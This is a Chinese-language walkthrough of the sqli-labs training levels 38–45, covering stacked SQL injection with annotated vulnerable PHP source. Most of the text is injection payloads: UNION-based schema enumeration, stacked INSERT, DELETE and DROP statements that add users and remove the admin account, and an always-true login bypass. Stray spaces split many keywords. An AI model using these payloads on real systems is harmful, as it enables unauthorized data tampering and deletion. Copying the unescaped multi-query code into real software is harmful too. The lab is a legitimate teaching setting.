sqli-labs靶场详解(less38-less45)

本文介绍: 登陆成功证明有注入点接下来使用叠加注入每次退出重新登陆添加构造的语句其实都不用万能密码登录因为反正后面的sql 语句都会执行前面的执行还是不执行都不影响。&login _password=123′ and ‘1’=’1 不报错了估计是单引号试试堆叠注入。%00 显示位置为2,3。

堆叠注入

less-38

less-38

?id=1′ and 1=1;%00 成功

?id=1′ and 1=2;%00 失败

不是吧这就出来了？

?id=1′ order b y 4;%00 报错 4列不行

?id=0′ union select 1,2,3;%00 显示位置为2,3

?id=0′ union select 1,database(),3;%00 数据库为security

?id=0′ union select 1,group _concat(table _name),3 from information _schema.table s where table _schema=’security‘;%00 不至于吧这就出来了

看源码

也没啥问题于是发现这已经到了第三大关了堆叠注入

搜索教程看看啥叫堆叠注入

搜索资料

例如以下这个例子：
用户输入：?id=1; delete from product s 服务器端生成的SQL语句为：select * from product s where product id=1; delete from product s当执行查询之后，第一条显示查询信息，第二条则是将整个表删除。

适用条件
 用户采用PDO编程（ POD（PHP Data Obje ct））且没有对参数进行过滤
 mysql i _multi _query()函数也可以造成堆叠注入

我们本次尝试的语句：
/?id=1′;insert into users(id,username,password) value s(‘100′,’abc‘,’abc‘); –+

去数据库中查看

成功

代码分析
&lt;?php
if(isset($_GET['id'])) //判断id参数是否存在
{
$id=$_GET['id']; //获取id参数
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."n");
fclose($fp);
//日志
$con1 = mysqli_connect($host,$dbuser,$dbpass,$dbname);//用于连接数据库
if (mysqli_connect_errno($con1))//查看是否连接成功
{
    echo "Failed to connect to MySQL: " . mysqli_connect_error();//失败报错
}
else//连接指定security数据库
{
    @mysqli_select_db($con1, $dbname) or die ( "Unable to connect to the database: $dbname");
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";//查询语句 注入点
if (mysqli_multi_query($con1, $sql))//一次执行可以执行多条语句 这个函数造成的堆叠注入
{
    if ($result = mysqli_store_result($con1))//将sql语句查询的结果保存到内存中 并返回一个对象
    {
        if($row = mysqli_fetch_row($result))//获取第一行数据
        {
            printf("Your Username is : %s", $row[1]);//第一列数据
            printf("Your Password is : %s", $row[2]);//第二列数据
        }
    }
    if (mysqli_more_results($con1))
    {
    }
}
else 
    {
	print_r(mysqli_error($con1)); 
    }
mysqli_close($con1);
}
	else { echo "Please input the ID as parameter with numeric value";}
?&gt;

less-39

?id=1 and 1=1 成功

?id=1 and 1=2 失败

整型注入点

使用堆叠注入

?id=1;insert into users(id,username,password) val ues(‘101’,’abc‘,’abc‘); –+

代码分析

和上一关没区别区别就是对参数的处理一个是整型一个是单引号字符型

less-40

判断注入点

?id=1 and 1=1 成功

?id=1 and 1=2 成功

?id=1′ 无输出结果

以上分析估计就是无报错函数为单引号字符型注入点

?id=1′) and 1=1;%00 成功

?id=1′) and 1=2;%00 失败

代码分析

同理对参数的处理方式为’)

less-41

?id=1′ 不显示结果证明还是和单引号有关

笑死我了当成字符型试了好久结果是整型

?id=1 and 1=1 成功

?id=1 and 1=2 无返回结果

和39关一样就是没有了报错函数

less-42

感觉像二次注入先不进行抓包先看看登录界面注册页面都是什么

经过测试 user name处是没有注入点的不能使用二次注入并且新建一次用户后不让我继续新建用户了

发现 pass word的位置报错了

&login_pass word=123′ and ‘1’=’1 不报错了估计是单引号试试堆叠注入

&login_pass word=123′ and ‘1’=’1′;insert into users(id,user name,pass word) values(‘104’,’abc‘,’abc‘);

报错函数也ok

less-43

和42关一样我们这题加入不知道账号密码

该如何做

在密码位置有报错

不报错了确定注入点了

判断出有3列

通过布尔的方式观察页面列数不同

页面黑屏但是并没有显示位置联合查询不行

依旧是报错注入

但是考察的不是报错注入而是叠加注入

我们通过报错注入发现有admin账户

使用叠加注入删除

lo gin_user=tzy&lo gin_pass word=tzy‘);delete from users where username=’admin‘;–+&m y su bmit=Login

admin用户不见了

less-44

采用盲注无报错百度搜的教程都是没有判断注入过程的直接使用叠加注入

lo gin_user=tzy&lo gin_password=tzy‘;delete from users where username=’admin1′;&my su bmit=Login

删除 admin1用户

less-45

做到这题我才明白这种题怎么做

首先选择一个经常出现的用户名采用万能密码登录

a’) OR 1 = 1# 采用万能密码有好处就是可以确定注入点类型如果符号引发报错也登录不成功如果因为符号引发的报错会导致永真的条件失效从而无法登陆

登陆成功证明有注入点接下来使用叠加注入每次退出重新登陆添加构造的语句其实都不用万能密码登录因为反正后面的sql语句都会执行前面的执行还是不执行都不影响

a’) OR 1 = 1;CREATE TABLE WhiteMoon LIKE users;#

a’) OR 1 = 1;INSERT INTO WhiteMoon SELECT * FROM users;#

a’) OR 1 = 1;DELETE FROM WhiteMoon;#

a’) OR 1 = 1;DROP TABLE WhiteMoon;#

最后发现多条语句前一条语句不报错的情况下才能执行第二条语句

&lo gin_password=tzy;DELETE FROM users WHERE username=’admin2′; 不可执行

&login_password=tzy‘);DELETE FROM use rs WHERE username=’admin2′; 可执行

后端sql语句

$username = mysqli_real_es cape_string($con1, $_POST[“login_user”]);

$password = $_POST[“login_password”];

$sql = “SELECT * FROM users WHERE username=(‘$username’) and password=(‘$password’)”;